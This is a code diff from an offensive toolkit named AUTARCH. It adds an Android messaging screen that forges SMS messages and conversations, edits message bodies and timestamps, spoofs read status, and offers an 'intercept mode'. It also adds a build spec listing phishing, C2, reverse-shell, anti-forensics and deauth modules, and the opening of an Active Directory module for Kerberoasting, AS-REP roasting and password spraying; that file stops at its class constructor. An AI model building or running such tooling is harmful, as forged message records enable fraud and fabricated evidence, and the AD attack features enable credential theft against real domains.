(conversations.isEmpty()) { + emptyState.visibility = View.VISIBLE + recyclerConversations.visibility = View.GONE + } else { + emptyState.visibility = View.GONE + recyclerConversations.visibility = View.VISIBLE + } + } + }.start() + } + + // ── Thread view ──────────────────────────────────────────────── + + private fun setupThreadView() { + messageAdapter = MessageAdapter(mutableListOf()) { message -> + showMessageContextMenu(message) + } + + recyclerMessages.apply { + layoutManager = LinearLayoutManager(requireContext()).apply { + stackFromEnd = true + } + adapter = messageAdapter + } + + btnBack.setOnClickListener { + closeThread() + } + + btnSend.setOnClickListener { + sendMessage() + } + + btnThreadExport.setOnClickListener { + exportCurrentThread() + } + } + + private fun openThread(conversation: MessagingRepository.Conversation) { + currentThreadId = conversation.threadId + currentAddress = conversation.address + + val displayName = conversation.contactName ?: conversation.address + threadContactName.text = displayName + threadAddress.text = if (conversation.contactName != null) conversation.address else "" + + // Mark as read + Thread { + repo.markAsRead(conversation.threadId) + }.start() + + // Load messages + loadMessages(conversation.threadId) + + // Switch views + conversationListContainer.visibility = View.GONE + threadViewContainer.visibility = View.VISIBLE + } + + private fun closeThread() { + currentThreadId = -1 + currentAddress = "" + + threadViewContainer.visibility = View.GONE + conversationListContainer.visibility = View.VISIBLE + + // Refresh conversations to update unread counts + loadConversations() + } + + private fun loadMessages(threadId: Long) { + Thread { + val messages = repo.getMessages(threadId) + handler.post { + messageAdapter.updateData(messages) + // Scroll to bottom + if (messages.isNotEmpty()) { + recyclerMessages.scrollToPosition(messages.size - 1) + } + } + }.start() + } + + private fun sendMessage() { + val body = inputMessage.text?.toString()?.trim() ?: return + if (body.isEmpty()) return + + inputMessage.setText("") + + Thread { + val success = repo.sendSms(currentAddress, body) + handler.post { + if (success) { + // Reload messages to show the sent message + loadMessages(currentThreadId) + } else { + // If we can't send (not default SMS), try forge as sent + val id = repo.forgeMessage( + currentAddress, body, + MessagingRepository.MESSAGE_TYPE_SENT, + System.currentTimeMillis(), read = true + ) + if (id >= 0) { + loadMessages(currentThreadId) + appendLog("Message inserted (forge mode — not actually sent)") + } else { + appendLog("Failed to send/insert — need default SMS app role") + Toast.makeText(requireContext(), + "Cannot send — set as default SMS app first", + Toast.LENGTH_SHORT).show() + } + } + } + }.start() + } + + private fun exportCurrentThread() { + if (currentThreadId < 0) return + + Thread { + val result = ModuleManager.executeAction("messaging", "export_thread:$currentThreadId", requireContext()) + handler.post { + appendLog(result.output) + for (detail in result.details) { + appendLog(" $detail") + } + showOutputLog() + } + }.start() + } + + // ── Search ───────────────────────────────────────────────────── + + private fun setupSearch() { + btnSearch.setOnClickListener { + if (searchBar.visibility == View.VISIBLE) { + searchBar.visibility = View.GONE + } else { + searchBar.visibility = View.VISIBLE + inputSearch.requestFocus() + } + } + + btnSearchGo.setOnClickListener { + val query = inputSearch.text?.toString()?.trim() ?: "" + if (query.isNotEmpty()) { + performSearch(query) + } + } + + btnSearchClose.setOnClickListener { + searchBar.visibility = View.GONE + inputSearch.setText("") + loadConversations() + } + } + + private fun performSearch(query: String) { + Thread { + val results = repo.searchMessages(query) + handler.post { + if (results.isEmpty()) { + appendLog("No results for '$query'") + showOutputLog() + } else { + // Group results by thread and show as conversations + val threadGroups = results.groupBy { it.threadId } + val conversations = threadGroups.map { (threadId, msgs) -> + val first = msgs.first() + MessagingRepository.Conversation( + threadId = threadId, + address = first.address, + snippet = "[${msgs.size} matches] ${first.body.take(40)}", + date = first.date, + messageCount = msgs.size, + unreadCount = 0, + contactName = first.contactName + ) + }.sortedByDescending { it.date } + + conversationAdapter.updateData(conversations) + emptyState.visibility = View.GONE + recyclerConversations.visibility = View.VISIBLE + appendLog("Found ${results.size} messages in ${conversations.size} threads") + } + } + }.start() + } + + // ── Toolbar actions ──────────────────────────────────────────── + + private fun setupToolbar() { + btnDefaultSms.setOnClickListener { + toggleDefaultSms() + } + + btnTools.setOnClickListener { anchor -> + showToolsMenu(anchor) + } + } + + private fun toggleDefaultSms() { + Thread { + if (!isDefaultSms) { + val result = ModuleManager.executeAction("messaging", "become_default", requireContext()) + handler.post { + if (result.success) { + isDefaultSms = true + btnDefaultSms.text = getString(R.string.messaging_restore_default) + appendLog("Archon is now default SMS app") + } else { + appendLog("Failed: ${result.output}") + } + showOutputLog() + } + } else { + val result = ModuleManager.executeAction("messaging", "restore_default", requireContext()) + handler.post { + if (result.success) { + isDefaultSms = false + btnDefaultSms.text = getString(R.string.messaging_become_default) + appendLog("Default SMS app restored") + } else { + appendLog("Failed: ${result.output}") + } + showOutputLog() + } + } + }.start() + } + + private fun showToolsMenu(anchor: View) { + val popup = PopupMenu(requireContext(), anchor) + popup.menu.add(0, 1, 0, "Export All Messages") + popup.menu.add(0, 2, 1, "Forge Message") + popup.menu.add(0, 3, 2, "Forge Conversation") + popup.menu.add(0, 4, 3, "RCS Status") + popup.menu.add(0, 5, 4, "Shizuku Status") + popup.menu.add(0, 6, 5, "Intercept Mode ON") + popup.menu.add(0, 7, 6, "Intercept Mode OFF") + + popup.setOnMenuItemClickListener { item -> + when (item.itemId) { + 1 -> executeModuleAction("export_all") + 2 -> showForgeMessageDialog() + 3 -> showForgeConversationDialog() + 4 -> executeModuleAction("rcs_status") + 5 -> executeModuleAction("shizuku_status") + 6 -> executeModuleAction("intercept_mode:on") + 7 -> executeModuleAction("intercept_mode:off") + } + true + } + + popup.show() + } + + private fun executeModuleAction(actionId: String) { + appendLog("Running: $actionId...") + showOutputLog() + + Thread { + val result = ModuleManager.executeAction("messaging", actionId, requireContext()) + handler.post { + appendLog(result.output) + for (detail in result.details.take(20)) { + appendLog(" $detail") + } + } + }.start() + } + + // ── Shizuku status ───────────────────────────────────────────── + + private fun refreshShizukuStatus() { + Thread { + val ready = shizuku.isReady() + handler.post { + setStatusDot(shizukuDot, ready) + } + }.start() + } + + private fun setStatusDot(dot: View, online: Boolean) { + val drawable = GradientDrawable() + drawable.shape = GradientDrawable.OVAL + drawable.setColor(if (online) Color.parseColor("#00FF41") else Color.parseColor("#666666")) + dot.background = drawable + } + + // ── Message context menu (long-press) ────────────────────────── + + private fun showMessageContextMenu(message: MessagingRepository.Message) { + val items = arrayOf( + "Copy", + "Edit Body", + "Delete", + "Change Timestamp", + "Spoof Read Status", + "Forward (Forge)" + ) + + AlertDialog.Builder(requireContext()) + .setTitle("Message Options") + .setItems(items) { _, which -> + when (which) { + 0 -> copyMessage(message) + 1 -> editMessageBody(message) + 2 -> deleteMessage(message) + 3 -> changeTimestamp(message) + 4 -> spoofReadStatus(message) + 5 -> forwardAsForge(message) + } + } + .show() + } + + private fun copyMessage(message: MessagingRepository.Message) { + val clipboard = requireContext().getSystemService(android.content.ClipboardManager::class.java) + val clip = android.content.ClipData.newPlainText("sms", message.body) + clipboard?.setPrimaryClip(clip) + Toast.makeText(requireContext(), "Copied to clipboard", Toast.LENGTH_SHORT).show() + } + + private fun editMessageBody(message: MessagingRepository.Message) { + val input = TextInputEditText(requireContext()).apply { + setText(message.body) + setTextColor(resources.getColor(R.color.text_primary, null)) + setBackgroundColor(resources.getColor(R.color.surface_dark, null)) + setPadding(32, 24, 32, 24) + } + + AlertDialog.Builder(requireContext()) + .setTitle("Edit Message Body") + .setView(input) + .setPositiveButton("Save") { _, _ -> + val newBody = input.text?.toString() ?: return@setPositiveButton + Thread { + val success = repo.updateMessage(message.id, body = newBody, type = null, date = null, read = null) + handler.post { + if (success) { + appendLog("Updated message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to update — need default SMS app role") + } + showOutputLog() + } + }.start() + } + .setNegativeButton("Cancel", null) + .show() + } + + private fun deleteMessage(message: MessagingRepository.Message) { + AlertDialog.Builder(requireContext()) + .setTitle("Delete Message") + .setMessage("Delete this message permanently?\n\n\"${message.body.take(60)}\"") + .setPositiveButton("Delete") { _, _ -> + Thread { + val success = repo.deleteMessage(message.id) + handler.post { + if (success) { + appendLog("Deleted message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to delete — need default SMS app role") + } + showOutputLog() + } + }.start() + } + .setNegativeButton("Cancel", null) + .show() + } + + private fun changeTimestamp(message: MessagingRepository.Message) { + val cal = Calendar.getInstance() + cal.timeInMillis = message.date + + DatePickerDialog(requireContext(), { _, year, month, day -> + TimePickerDialog(requireContext(), { _, hour, minute -> + cal.set(year, month, day, hour, minute) + val newDate = cal.timeInMillis + + Thread { + val success = repo.updateMessage(message.id, body = null, type = null, date = newDate, read = null) + handler.post { + if (success) { + val fmt = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.US) + appendLog("Changed timestamp to ${fmt.format(Date(newDate))}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to change timestamp") + } + showOutputLog() + } + }.start() + }, cal.get(Calendar.HOUR_OF_DAY), cal.get(Calendar.MINUTE), true).show() + }, cal.get(Calendar.YEAR), cal.get(Calendar.MONTH), cal.get(Calendar.DAY_OF_MONTH)).show() + } + + private fun spoofReadStatus(message: MessagingRepository.Message) { + val items = arrayOf("Mark as Read", "Mark as Unread") + AlertDialog.Builder(requireContext()) + .setTitle("Read Status") + .setItems(items) { _, which -> + val newRead = which == 0 + Thread { + val success = repo.updateMessage(message.id, body = null, type = null, date = null, read = newRead) + handler.post { + if (success) { + appendLog("Set read=${newRead} for message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to update read status") + } + showOutputLog() + } + }.start() + } + .show() + } + + private fun forwardAsForge(message: MessagingRepository.Message) { + // Pre-fill the forge dialog with this message's body + showForgeMessageDialog(prefillBody = message.body) + } + + // ── Forge dialogs ────────────────────────────────────────────── + + private fun showForgeMessageDialog(prefillBody: String? = null) { + val dialogView = LayoutInflater.from(requireContext()) + .inflate(R.layout.dialog_forge_message, null) + + val forgeAddress = dialogView.findViewById(R.id.forge_address) + val forgeContactName = dialogView.findViewById(R.id.forge_contact_name) + val forgeBody = dialogView.findViewById(R.id.forge_body) + val forgeTypeReceived = dialogView.findViewById(R.id.forge_type_received) + val forgeTypeSent = dialogView.findViewById(R.id.forge_type_sent) + val forgePickDate = dialogView.findViewById(R.id.forge_pick_date) + val forgePickTime = dialogView.findViewById(R.id.forge_pick_time) + val forgeReadStatus = dialogView.findViewById(R.id.forge_read_status) + + prefillBody?.let { forgeBody.setText(it) } + + // If we're in a thread, prefill the address + if (currentAddress.isNotEmpty()) { + forgeAddress.setText(currentAddress) + } + + // Direction toggle + var selectedType = MessagingRepository.MESSAGE_TYPE_RECEIVED + forgeTypeReceived.setOnClickListener { + selectedType = MessagingRepository.MESSAGE_TYPE_RECEIVED + forgeTypeReceived.tag = "selected" + forgeTypeSent.tag = null + } + forgeTypeSent.setOnClickListener { + selectedType = MessagingRepository.MESSAGE_TYPE_SENT + forgeTypeSent.tag = "selected" + forgeTypeReceived.tag = null + } + + // Date/time pickers + forgeCalendar = Calendar.getInstance() + val dateFormat = SimpleDateFormat("MMM dd, yyyy", Locale.US) + val timeFormat = SimpleDateFormat("HH:mm", Locale.US) + forgePickDate.text = dateFormat.format(forgeCalendar.time) + forgePickTime.text = timeFormat.format(forgeCalendar.time) + + forgePickDate.setOnClickListener { + DatePickerDialog(requireContext(), { _, year, month, day -> + forgeCalendar.set(Calendar.YEAR, year) + forgeCalendar.set(Calendar.MONTH, month) + forgeCalendar.set(Calendar.DAY_OF_MONTH, day) + forgePickDate.text = dateFormat.format(forgeCalendar.time) + }, forgeCalendar.get(Calendar.YEAR), forgeCalendar.get(Calendar.MONTH), + forgeCalendar.get(Calendar.DAY_OF_MONTH)).show() + } + + forgePickTime.setOnClickListener { + TimePickerDialog(requireContext(), { _, hour, minute -> + forgeCalendar.set(Calendar.HOUR_OF_DAY, hour) + forgeCalendar.set(Calendar.MINUTE, minute) + forgePickTime.text = timeFormat.format(forgeCalendar.time) + }, forgeCalendar.get(Calendar.HOUR_OF_DAY), forgeCalendar.get(Calendar.MINUTE), true).show() + } + + AlertDialog.Builder(requireContext()) + .setView(dialogView) + .setPositiveButton("Forge") { _, _ -> + val address = forgeAddress.text?.toString()?.trim() ?: "" + val contactName = forgeContactName.text?.toString()?.trim() + val body = forgeBody.text?.toString()?.trim() ?: "" + val read = forgeReadStatus.isChecked + val date = forgeCalendar.timeInMillis + + if (address.isEmpty() || body.isEmpty()) { + Toast.makeText(requireContext(), "Address and body required", Toast.LENGTH_SHORT).show() + return@setPositiveButton + } + + Thread { + val id = repo.forgeMessage( + address = address, + body = body, + type = selectedType, + date = date, + contactName = contactName, + read = read + ) + handler.post { + if (id >= 0) { + val direction = if (selectedType == 1) "received" else "sent" + appendLog("Forged $direction message id=$id to $address") + showOutputLog() + + // Refresh view + if (currentThreadId > 0) { + loadMessages(currentThreadId) + } else { + loadConversations() + } + } else { + appendLog("Forge failed — need default SMS app role") + showOutputLog() + } + } + }.start() + } + .setNegativeButton("Cancel", null) + .show() + } + + private fun showForgeConversationDialog() { + val input = TextInputEditText(requireContext()).apply { + hint = "Phone number (e.g. +15551234567)" + setTextColor(resources.getColor(R.color.text_primary, null)) + setHintTextColor(resources.getColor(R.color.text_muted, null)) + setBackgroundColor(resources.getColor(R.color.surface_dark, null)) + setPadding(32, 24, 32, 24) + inputType = android.text.InputType.TYPE_CLASS_PHONE + } + + AlertDialog.Builder(requireContext()) + .setTitle("Forge Conversation") + .setMessage("Create a fake conversation with back-and-forth messages from this number:") + .setView(input) + .setPositiveButton("Forge") { _, _ -> + val address = input.text?.toString()?.trim() ?: "" + if (address.isEmpty()) { + Toast.makeText(requireContext(), "Phone number required", Toast.LENGTH_SHORT).show() + return@setPositiveButton + } + executeModuleAction("forge_conversation:$address") + // Refresh after a short delay for the inserts to complete + handler.postDelayed({ loadConversations() }, 2000) + } + .setNegativeButton("Cancel", null) + .show() + } + + // ── Output log ───────────────────────────────────────────────── + + private fun setupOutputLog() { + btnCloseLog.setOnClickListener { + outputLogCard.visibility = View.GONE + } + } + + private fun showOutputLog() { + outputLogCard.visibility = View.VISIBLE + } + + private fun appendLog(msg: String) { + val current = outputLog.text.toString() + val lines = current.split("\n").takeLast(30) + outputLog.text = (lines + "> $msg").joinToString("\n") + } +} diff --git a/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml b/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml new file mode 100644 index 0000000..d34c48f --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml @@ -0,0 +1,203 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/fragment_messaging.xml b/autarch_companion/app/src/main/res/layout/fragment_messaging.xml new file mode 100644 index 0000000..f73b14c --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/fragment_messaging.xml @@ -0,0 +1,340 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_conversation.xml b/autarch_companion/app/src/main/res/layout/item_conversation.xml new file mode 100644 index 0000000..b3abf62 --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_conversation.xml @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_message_received.xml b/autarch_companion/app/src/main/res/layout/item_message_received.xml new file mode 100644 index 0000000..93a34d1 --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_message_received.xml @@ -0,0 +1,67 @@ + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_message_sent.xml b/autarch_companion/app/src/main/res/layout/item_message_sent.xml new file mode 100644 index 0000000..6b2d5ec --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_message_sent.xml @@ -0,0 +1,78 @@ + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/menu/bottom_nav.xml b/autarch_companion/app/src/main/res/menu/bottom_nav.xml index 1237016..3cffc12 100644 --- a/autarch_companion/app/src/main/res/menu/bottom_nav.xml +++ b/autarch_companion/app/src/main/res/menu/bottom_nav.xml @@ -5,9 +5,9 @@ android:icon="@android:drawable/ic_menu_compass" android:title="@string/nav_dashboard" /> + android:id="@+id/nav_messaging" + android:icon="@android:drawable/ic_dialog_email" + android:title="@string/nav_messaging" /> + + Offense Settings + + Messages + SMS/RCS + DEFAULT + RESTORE + TOOLS + Search messages... + Type a message... + SEND + EXPORT + New message + No conversations found.\nCheck SMS permissions or tap + to forge a message. + + + FORGE MESSAGE + Phone Number + +15551234567 + Contact Name (optional) + John Doe + Message Body + Enter message text... + Direction + RECEIVED + SENT + Date / Time + Date + Time + Mark as read + SETTINGS Server Connection diff --git a/autarch_public.spec b/autarch_public.spec new file mode 100644 index 0000000..d28b779 --- /dev/null +++ b/autarch_public.spec @@ -0,0 +1,287 @@ +# -*- mode: python ; coding: utf-8 -*- +# PyInstaller spec for AUTARCH Public Release +# +# Build: pyinstaller autarch_public.spec +# Output: dist/autarch/ +# ├── autarch.exe (CLI — full framework, console window) +# └── autarch_web.exe (Web — double-click to launch dashboard + tray icon, no console) + +import sys +from pathlib import Path + +SRC = Path(SPECPATH) + +block_cipher = None + +# ── Data files (non-Python assets to bundle) ───────────────────────────────── +# Only include files that actually exist to prevent build failures +_candidate_files = [ + # Web assets + (SRC / 'web' / 'templates', 'web/templates'), + (SRC / 'web' / 'static', 'web/static'), + + # Data (SQLite DBs, site lists, config defaults) + (SRC / 'data', 'data'), + + # Modules directory (dynamically loaded at runtime) + (SRC / 'modules', 'modules'), + + # Icon + (SRC / 'autarch.ico', '.'), + + # DNS server binary + (SRC / 'services' / 'dns-server' / 'autarch-dns.exe', 'services/dns-server'), + + # Root-level config and docs + (SRC / 'autarch_settings.conf', '.'), + (SRC / 'user_manual.md', '.'), + (SRC / 'windows_manual.md', '.'), + (SRC / 'custom_sites.inf', '.'), + (SRC / 'custom_adultsites.json', '.'), +] + +added_files = [(str(src), dst) for src, dst in _candidate_files if src.exists()] + +# ── Hidden imports ──────────────────────────────────────────────────────────── +hidden_imports = [ + # Flask ecosystem + 'flask', 'flask.templating', 'jinja2', 'jinja2.ext', + 'werkzeug', 'werkzeug.serving', 'werkzeug.debug', + 'markupsafe', + + # Core libraries + 'bcrypt', 'requests', 'msgpack', 'pyserial', 'qrcode', 'PIL', + 'PIL.Image', 'PIL.ImageDraw', 'PIL.ImageFont', 'cryptography', + + # System tray + 'pystray', 'pystray._win32', + + # AUTARCH core modules + 'core.config', 'core.paths', 'core.banner', 'core.menu', 'core.tray', + 'core.llm', 'core.agent', 'core.tools', + 'core.msf', 'core.msf_interface', + 'core.hardware', 'core.android_protect', + 'core.upnp', 'core.wireshark', 'core.wireguard', + 'core.mcp_server', 'core.discovery', + 'core.osint_db', 'core.nvd', + 'core.model_router', 'core.rules', 'core.autonomy', + + # Web routes (Flask blueprints) + 'web.app', 'web.auth', + 'web.routes.auth_routes', + 'web.routes.dashboard', + 'web.routes.defense', + 'web.routes.offense', + 'web.routes.counter', + 'web.routes.analyze', + 'web.routes.osint', + 'web.routes.simulate', + 'web.routes.settings', + 'web.routes.upnp', + 'web.routes.wireshark', + 'web.routes.hardware', + 'web.routes.android_exploit', + 'web.routes.iphone_exploit', + 'web.routes.android_protect', + 'web.routes.wireguard', + 'web.routes.revshell', + 'web.routes.archon', + 'web.routes.msf', + 'web.routes.chat', + 'web.routes.targets', + 'web.routes.encmodules', + 'web.routes.llm_trainer', + 'web.routes.autonomy', + 'web.routes.loadtest', + 'web.routes.phishmail', + 'web.routes.dns_service', + 'web.routes.ipcapture', + 'web.routes.hack_hijack', + 'web.routes.password_toolkit', + 'web.routes.webapp_scanner', + 'web.routes.report_engine', + 'web.routes.net_mapper', + 'web.routes.c2_framework', + 'web.routes.wifi_audit', + 'web.routes.threat_intel', + 'web.routes.steganography', + 'web.routes.api_fuzzer', + 'web.routes.ble_scanner', + 'web.routes.forensics', + 'web.routes.rfid_tools', + 'web.routes.cloud_scan', + 'web.routes.malware_sandbox', + 'web.routes.log_correlator', + 'web.routes.anti_forensics', + 'web.routes.vuln_scanner', + 'web.routes.exploit_dev', + 'web.routes.social_eng', + 'web.routes.ad_audit', + 'web.routes.mitm_proxy', + 'web.routes.pineapple', + 'web.routes.deauth', + 'web.routes.reverse_eng', + 'web.routes.sdr_tools', + 'web.routes.container_sec', + 'web.routes.email_sec', + 'web.routes.incident_resp', + 'modules.loadtest', + 'modules.phishmail', + 'modules.ipcapture', + 'modules.hack_hijack', + 'modules.password_toolkit', + 'modules.webapp_scanner', + 'modules.report_engine', + 'modules.net_mapper', + 'modules.c2_framework', + 'modules.wifi_audit', + 'modules.threat_intel', + 'modules.steganography', + 'modules.api_fuzzer', + 'modules.ble_scanner', + 'modules.forensics', + 'modules.rfid_tools', + 'modules.cloud_scan', + 'modules.malware_sandbox', + 'modules.log_correlator', + 'modules.anti_forensics', + 'modules.vuln_scanner', + 'modules.exploit_dev', + 'modules.social_eng', + 'modules.ad_audit', + 'modules.mitm_proxy', + 'modules.pineapple', + 'modules.deauth', + 'modules.reverse_eng', + 'modules.sdr_tools', + 'modules.container_sec', + 'modules.email_sec', + 'modules.incident_resp', + 'modules.starlink_hack', + 'modules.sms_forge', + 'web.routes.starlink_hack', + 'web.routes.sms_forge', + 'modules.rcs_tools', + 'web.routes.rcs_tools', + 'core.dns_service', + + # Standard library (sometimes missed on Windows) + 'email.mime.text', 'email.mime.multipart', + 'xml.etree.ElementTree', + 'sqlite3', 'json', 'logging', 'logging.handlers', + 'threading', 'queue', 'uuid', 'hashlib', 'zlib', + 'configparser', 'platform', 'socket', 'shutil', + 'importlib', 'importlib.util', 'importlib.metadata', + 'webbrowser', 'ssl', +] + +excludes = [ + # Exclude heavy optional deps not needed at runtime + 'torch', 'transformers', + 'tkinter', 'matplotlib', 'numpy', + # CUDA / quantization libraries + 'bitsandbytes', + # HuggingFace ecosystem + 'huggingface_hub', 'safetensors', 'tokenizers', + # MCP/uvicorn/starlette + 'mcp', 'uvicorn', 'starlette', 'anyio', 'httpx', 'httpx_sse', + 'httpcore', 'h11', 'h2', 'hpack', 'hyperframe', + # Pydantic + 'pydantic', 'pydantic_core', 'pydantic_settings', + # Other heavy packages + 'scipy', 'pandas', 'tensorflow', 'keras', + 'IPython', 'notebook', 'jupyterlab', + 'fsspec', 'rich', 'typer', +] + +# ── Analysis for CLI entry point ───────────────────────────────────────────── +a_cli = Analysis( + ['autarch.py'], + pathex=[str(SRC)], + binaries=[], + datas=added_files, + hiddenimports=hidden_imports, + hookspath=[], + hooksconfig={}, + runtime_hooks=[], + excludes=excludes, + noarchive=False, + optimize=0, +) + +# ── Analysis for Web entry point ───────────────────────────────────────────── +a_web = Analysis( + ['autarch_web.py'], + pathex=[str(SRC)], + binaries=[], + datas=added_files, + hiddenimports=hidden_imports, + hookspath=[], + hooksconfig={}, + runtime_hooks=[], + excludes=excludes, + noarchive=False, + optimize=0, +) + +# ── Merge analyses (shared libraries only stored once) ─────────────────────── +MERGE( + (a_cli, 'autarch', 'autarch'), + (a_web, 'autarch_web', 'autarch_web'), +) + +# ── CLI executable (console window) ───────────────────────────────────────── +pyz_cli = PYZ(a_cli.pure, a_cli.zipped_data, cipher=block_cipher) +exe_cli = EXE( + pyz_cli, + a_cli.scripts, + [], + exclude_binaries=True, + name='autarch', + debug=False, + bootloader_ignore_signals=False, + strip=False, + upx=True, + console=True, + disable_windowed_traceback=False, + argv_emulation=False, + target_arch=None, + codesign_identity=None, + entitlements_file=None, + icon=str(SRC / 'autarch.ico'), +) + +# ── Web executable (NO console window — tray icon only) ───────────────────── +pyz_web = PYZ(a_web.pure, a_web.zipped_data, cipher=block_cipher) +exe_web = EXE( + pyz_web, + a_web.scripts, + [], + exclude_binaries=True, + name='autarch_web', + debug=False, + bootloader_ignore_signals=False, + strip=False, + upx=True, + console=False, # <-- No console window + disable_windowed_traceback=False, + argv_emulation=False, + target_arch=None, + codesign_identity=None, + entitlements_file=None, + icon=str(SRC / 'autarch.ico'), +) + +# ── Collect everything into one directory ──────────────────────────────────── +coll = COLLECT( + exe_cli, + a_cli.binaries, + a_cli.datas, + exe_web, + a_web.binaries, + a_web.datas, + strip=False, + upx=True, + upx_exclude=[], + name='autarch', +) diff --git a/modules/ad_audit.py b/modules/ad_audit.py new file mode 100644 index 0000000..5579317 --- /dev/null +++ b/modules/ad_audit.py @@ -0,0 +1,1594 @@ +"""AUTARCH Active Directory Audit + +LDAP enumeration, Kerberoasting, AS-REP roasting, ACL analysis, +BloodHound collection, and password spray for AD security assessment. +""" + +import os +import sys +import json +import time +import subprocess +import struct +import random +import threading +from pathlib import Path +from datetime import datetime, timedelta + +# Module metadata +DESCRIPTION = "Active Directory enumeration & attack" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +# Path setup +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return Path(__file__).parent.parent / 'data' + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + CYAN = YELLOW = GREEN = RED = BOLD = DIM = RESET = WHITE = MAGENTA = "" + def clear_screen(): pass + def display_banner(): pass + +# Optional dependency flags +try: + import ldap3 + from ldap3 import Server, Connection, ALL, NTLM, SUBTREE, ALL_ATTRIBUTES + from ldap3.core.exceptions import LDAPException + HAS_LDAP3 = True +except ImportError: + HAS_LDAP3 = False + +try: + from impacket.ldap import ldap as impacket_ldap + from impacket.ldap import ldapasn1 as ldapasn1 + HAS_IMPACKET_LDAP = True +except ImportError: + HAS_IMPACKET_LDAP = False + +try: + from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS + from impacket.krb5 import constants as krb5_constants + from impacket.krb5.types import Principal, KerberosTime + HAS_IMPACKET_KRB = True +except ImportError: + HAS_IMPACKET_KRB = False + +# AD timestamp epoch: Jan 1, 1601 +AD_EPOCH = datetime(1601, 1, 1) + +# User Account Control flags +UAC_FLAGS = { + 0x0001: 'SCRIPT', + 0x0002: 'ACCOUNTDISABLE', + 0x0008: 'HOMEDIR_REQUIRED', + 0x0010: 'LOCKOUT', + 0x0020: 'PASSWD_NOTREQD', + 0x0040: 'PASSWD_CANT_CHANGE', + 0x0080: 'ENCRYPTED_TEXT_PWD_ALLOWED', + 0x0100: 'TEMP_DUPLICATE_ACCOUNT', + 0x0200: 'NORMAL_ACCOUNT', + 0x0800: 'INTERDOMAIN_TRUST_ACCOUNT', + 0x1000: 'WORKSTATION_TRUST_ACCOUNT', + 0x2000: 'SERVER_TRUST_ACCOUNT', + 0x10000: 'DONT_EXPIRE_PASSWORD', + 0x20000: 'MPC_LOGON_ACCOUNT', + 0x40000: 'SMARTCARD_REQUIRED', + 0x80000: 'TRUSTED_FOR_DELEGATION', + 0x100000: 'NOT_DELEGATED', + 0x200000: 'USE_DES_KEY_ONLY', + 0x400000: 'DONT_REQUIRE_PREAUTH', + 0x800000: 'PASSWORD_EXPIRED', + 0x1000000: 'TRUSTED_TO_AUTH_FOR_DELEGATION', + 0x4000000: 'PARTIAL_SECRETS_ACCOUNT', +} + +# Dangerous ACE rights +DANGEROUS_RIGHTS = { + 'GenericAll': 'Full control over the object', + 'GenericWrite': 'Modify all attributes of the object', + 'WriteOwner': 'Change the owner of the object', + 'WriteDACL': 'Modify the DACL of the object', + 'Self': 'Self-membership — can add self to group', + 'ForceChangePassword': 'Reset the password without knowing current', + 'WriteProperty-Member': 'Can modify group membership', + 'WriteProperty-Script-Path': 'Can modify logon script path', + 'ExtendedRight-User-Force-Change-Password': 'Force password reset', + 'ExtendedRight-DS-Replication-Get-Changes': 'DCSync — replicate directory changes', + 'ExtendedRight-DS-Replication-Get-Changes-All': 'DCSync — replicate all changes including secrets', +} + +# Well-known SIDs +WELL_KNOWN_SIDS = { + 'S-1-5-32-544': 'BUILTIN\\Administrators', + 'S-1-5-32-545': 'BUILTIN\\Users', + 'S-1-5-32-548': 'BUILTIN\\Account Operators', + 'S-1-5-32-549': 'BUILTIN\\Server Operators', + 'S-1-5-32-550': 'BUILTIN\\Print Operators', + 'S-1-5-32-551': 'BUILTIN\\Backup Operators', +} + + +def _ad_timestamp_to_str(ts): + """Convert AD timestamp (100-nanosecond intervals since 1601) to readable string.""" + if not ts or ts == 0 or ts == '0': + return 'Never' + try: + ts = int(ts) + if ts <= 0 or ts > 2650467743990000000: + return 'Never' + seconds = ts / 10_000_000 + dt = AD_EPOCH + timedelta(seconds=seconds) + return dt.strftime('%Y-%m-%d %H:%M:%S') + except (ValueError, OverflowError, OSError): + return 'Unknown' + + +def _parse_uac(uac_value): + """Parse userAccountControl into list of flag names.""" + try: + uac = int(uac_value) + except (ValueError, TypeError): + return [] + flags = [] + for bit, name in UAC_FLAGS.items(): + if uac & bit: + flags.append(name) + return flags + + +def _get_domain_dn(domain): + """Convert domain name to LDAP DN. e.g. corp.local -> DC=corp,DC=local""" + return ','.join(f'DC={part}' for part in domain.split('.')) + + +class ADToolkit: + """Active Directory enumeration and attack toolkit.""" + + def __init__(self): + self.conn = None + self.server = None + self.dc_host = None + self.domain = None + self.domain_dn = None + self.username = None + self.password = None + self.use_ssl = False + self.connected = False + + # Results storage + self.results = { + 'users': [], + 'groups': [], + 'computers': [], + 'ous': [], + 'gpos': [], + 'trusts': [], + 'dcs': [], + 'spn_accounts': [], + 'asrep_accounts': [], + 'admin_accounts': [], + 'kerberoast_hashes': [], + 'asrep_hashes': [], + 'spray_results': [], + 'acl_findings': [], + 'unconstrained_delegation': [], + 'constrained_delegation': [], + 'bloodhound': {}, + } + + # Data directory + self.data_dir = Path(str(get_data_dir())) / 'ad_audit' 